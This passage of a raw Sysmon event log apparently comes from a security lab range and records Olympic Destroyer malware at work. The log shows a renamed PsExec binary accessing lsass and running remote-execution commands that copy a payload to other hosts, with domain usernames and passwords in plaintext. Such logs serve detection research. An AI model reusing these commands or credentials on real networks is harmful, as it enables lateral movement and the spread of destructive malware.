10341000x8000000000000000292016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.832{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.832{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.836{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.832{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.816{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FA0FAB5C04815EE3B37E2FBC1A5FBF9,SHA256=50ED5FD5E6E7B036529F7C1127A25D8811F549B1592396CB9A967AC23739A431,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.816{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.816{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.816{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.816{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-DC05-000000003802}7040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-DC05-000000003802}7040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.797{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.794{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.779{C8EA50B7-12FE-6216-DC05-000000003802}70406724C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.763{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-DC05-000000003802}7040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.748{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-DC05-000000003802}7040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.798{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.807{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.798{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-F205-000000003802}6296C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.783{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.783{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.783{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.767{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F105-000000003802}5588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.767{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-F105-000000003802}5588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:04.767{C8EA50B7-1300-6216-EE05-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 